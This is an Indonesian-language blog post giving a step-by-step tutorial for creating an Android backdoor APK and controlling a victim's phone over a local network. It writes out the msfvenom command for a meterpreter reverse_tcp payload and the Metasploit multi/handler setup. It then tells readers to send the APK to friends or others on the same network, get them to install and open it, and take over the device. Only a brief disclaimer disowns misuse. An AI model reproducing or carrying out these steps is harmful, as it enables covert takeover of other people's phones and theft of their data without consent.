Exploit Android Dengan LAN

Hello good people.... kali ini saya akan post tentang...

  EXPLOIT ANDROID DENGAN KONEKSI LAN



Sedikit penjelasan nih... di post perdana saya... saya akan memberi tutorial
yg dimana file backdoornya tidak di embed atau di sembunyikan ke dalam APK
  Biar gampang dan gak repot :v hahaha....

Let's do This !!!

*First Step*
  siap kan backdoor dengan cara...

  (ketik : msfvenom -p android/meterpreter/reverse_tcp lhost=IPKALIAN
   lport=PORTYGDIINGINKAN R > NAMAFILEYGDIINGINKAN.apk)

*Langkah Kedua*

  (ketik : msfconsole dan tunggu sebentar)

*Langkah Ketiga*

 (ketikan di console metasploit " use exploit/multi/handler " lalu
 " set payload android/meterpreter/reverse_tcp " next
  " set lhost ipkalian " lalu " set lport portbackdoornya " lalu
 " exploit -j -z " (setiap akhir command klik enter)


(kirim backdoor yg kalian buat ke teman atau orang yg ada dalam satu jaringan LAN lalu siruh install dan pilih buka)

*langkah Keempat*

kalian akan masuk sesi meterpreter contohnya gini nih " meterpreter:> "
nah kalian tinggal eksekusi si target deh... hahaha....


FULL TUTORIAL, LIAT DIBAWAH ATAU CHANNEL YOUTUBE




NB :
- OS yg saya gunakan itu Parrot Security "https://www.parrotsec.org/download.fx"

-   Cara ini cuma buat sekedar referensi aj.. jadi kalo situ make buat hal yg gk baik ya... saya gk bertanggung jawab atas perbuatan anda

-   Kalau mau liat youtubenya DISINI

Comments

Popular Posts